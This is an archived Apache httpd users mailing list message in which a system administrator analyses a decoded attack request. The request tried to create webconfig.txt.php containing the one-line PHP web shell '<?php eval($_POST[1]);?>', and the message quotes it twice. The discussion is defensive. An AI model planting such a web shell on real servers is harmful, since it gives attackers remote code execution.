httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Lentes, Bernd" <>
Subject Re: [users@httpd] am i hacked ?
Date Mon, 06 Feb 2017 19:17:00 GMT

----- On Feb 6, 2017, at 6:32 PM, Bernd Lentes wrote:

> ----- On Feb 6, 2017, at 5:54 PM, Jack Swan wrote:
>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the file being:
>> <?php eval($_POST[1]);?>
>> I didn't decode the remaining lines. I think they're just trying to do the same
>> thing.
> You are right. It's the base64 decoded stuff. is
> helpful.

OK. I think i understand most of it.
First the attacker sets some values appropriate for him. Then he tries to create a file webconfig.txt.php
and to write
<?php eval($_POST[1]);?> in it.
Fortunately wwwrun can't write in /sr/www ... , following
years ago.
If he could create the file, then he is able to sent arbitrary stuff to it which is executed
by eval.

Some things are still unclear for me:

What is the purpose of the two echos ?
Why has the request status code 200 ?
What is the purpose of the 1 direct behind the question mark ?
What is the 1 in the array $_POST ? Arrays start with index 0, i think (i'm not a php developer).



Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671

To unsubscribe, e-mail:
For additional commands, e-mail:

View raw message